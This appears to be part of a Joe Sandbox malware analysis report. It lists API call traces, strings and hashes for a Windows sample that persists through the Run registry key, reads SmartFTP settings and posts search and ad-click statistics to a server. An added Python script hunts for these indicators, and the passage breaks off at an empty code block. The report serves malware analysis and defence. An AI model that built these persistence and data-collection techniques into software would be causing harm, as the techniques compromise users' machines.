                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                  • String ID: UniqueNum
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$hOAd$x
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • 0, xrefs: 0040AA5B
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 00409046
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  APIs
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004051EB
                  Strings
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  • personal favorites, xrefs: 00405176
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: EnvironmentExpandStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID:
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  APIs
                  • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"$"encrypted"
                  • API String ID: 2525500382-4151690107
                  • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                  • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                  • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"$"url"
                  • API String ID: 2525500382-2438671658
                  • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                  • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                  • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?), ref: 004095A4
                  • CharLowerW.USER32(?,?,?,?,?,?,?), ref: 004095D8
                  • SysFreeString.OLEAUT32(?), ref: 00409608
                  • SysFreeString.OLEAUT32(?), ref: 0040960D
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer
                  • API String ID: 71445658-938904094
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC

                  Execution Graph

                  Execution Coverage:10.3%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:696
                  Total number of Limit Nodes:13

                  Control-flow Graph

                  control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 311 40ac0e-40ac18 FindClose 308->311 310 40ac1c-40ac1f 309->310 311->310
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,00000400,?,?,?,0040B3BC,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 26fd06bcf747dc08a64e37c423eb7452492142a7ae799de64f6f1f7aeac1b0c0
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 26fd06bcf747dc08a64e37c423eb7452492142a7ae799de64f6f1f7aeac1b0c0
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF
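The persistence routine listed above (GetModuleFileNameW, RegCreateKeyExW on the Run key, CopyFileW, ExitProcess, and the "/nomove" switch, "IueiOod" value name and "opeqmc.exe" file name from its string table) yields a few concrete hunting indicators. The script below is an added example, not code from the Joe Sandbox report or from the sample: it scores Run-key entries against those three strings. The entries it ships with are constructed; only read_run_keys() touches a real registry and it needs a Windows host. Because the value and file names look generated (the snapshot file name in this report, omsecor, already differs from opeqmc.exe in the string table), each indicator is reported on its own rather than requiring all three.

```python
"""Hunt for the Run-key persistence indicators listed in this report.

Added example; not code from the Joe Sandbox report or from the sample.
Indicators: value name "IueiOod", file name "opeqmc.exe" and the "/nomove"
switch, under the HKCU and HKLM Run keys the sample opens.
"""
import re
from typing import Dict, Iterable, List, Tuple

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Indicators taken from the String IDs of the routine above (compared case-folded).
VALUE_NAME_IOC = "iueiood"
FILE_NAME_IOC = "opeqmc.exe"
SWITCH_RE = re.compile(r"(?:^|\s)/nomove(?:\s|$)")

# A Run entry: (hive, value name, value data).
Entry = Tuple[str, str, str]

# Constructed sample entries, not taken from the report; paths/names are placeholders.
SAMPLE_ENTRIES: List[Entry] = [
    ("HKCU", "OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKCU", "IueiOod", r"C:\Windows\opeqmc.exe /nomove"),
    ("HKLM", "SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("HKLM", "Updater", r'"C:\Windows\omsecor.exe" /nomove'),
]


def classify_run_entry(name: str, data: str) -> List[str]:
    """Return the indicator labels an autorun value matches (empty list = no match)."""
    hits: List[str] = []
    if name.lower() == VALUE_NAME_IOC:
        hits.append("value-name")
    low = data.lower()
    if FILE_NAME_IOC in low:
        hits.append("file-name")
    if SWITCH_RE.search(low):
        hits.append("nomove-switch")
    return hits


def scan_entries(entries: Iterable[Entry]) -> List[Dict[str, object]]:
    """Run the classifier over (hive, name, data) tuples and keep only matches."""
    findings: List[Dict[str, object]] = []
    for hive, name, data in entries:
        hits = classify_run_entry(name, data)
        if hits:
            findings.append({"hive": hive, "name": name, "data": data, "hits": hits})
    return findings


def read_run_keys() -> List[Entry]:
    """Enumerate the two Run keys the sample opens. Windows only (uses winreg)."""
    import winreg  # imported here so the matcher above stays portable

    entries: List[Entry] = []
    for hive_name, hive in (("HKCU", winreg.HKEY_CURRENT_USER),
                            ("HKLM", winreg.HKEY_LOCAL_MACHINE)):
        try:
            key = winreg.OpenKey(hive, RUN_KEY, 0, winreg.KEY_READ)
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                entries.append((hive_name, name, str(data)))
                index += 1
    return entries


if __name__ == "__main__":
    # On a Windows host, replace SAMPLE_ENTRIES with read_run_keys().
    for finding in scan_entries(SAMPLE_ENTRIES):
        print(f"{finding['hive']}\\...\\Run\\{finding['name']}: {', '.join(finding['hits'])}")
```

A single "value-name" or "file-name" hit on a different machine may be a coincidence; the "/nomove" switch combined with an executable living directly under C:\Windows (the report's "Drops executables to the windows directory" signature) is the stronger pair to pivot on.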

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • HeapAlloc.KERNEL32(00000000), ref: 0040763F
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                  • CloseHandle.KERNEL32(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2497881847.0000000000405000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000B.00000002.2497825310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497881847.0000000000409000.00000020.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2497949391.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 0000000B.00000002.2498007189.0000000000411000.00000004.00000001.01000000.00000007.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_omsecor.jbxd
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
                  • String ID:
                  • API String ID: 1458499590-0
                  • Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
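The routine above copies one file to another and then re-reads 0x40 bytes from offset 0 and 0xF8 bytes from a second offset before writing 0xF8 bytes back. 0x40 is sizeof(IMAGE_DOS_HEADER) and 0xF8 is sizeof(IMAGE_NT_HEADERS32), so the sequence is consistent with the dropped copy receiving an edited NT header; the listing does not show which field is changed. Rather than assume one, the added example below (not code from the report or the sample) diffs the NT header fields of an original sample against a dropped copy so the change can be confirmed from the files. The two images it builds when run without arguments are constructed in memory; the TimeDateStamp/CheckSum change in that demo input is only an illustration, not a claim about what this sample does.

```python
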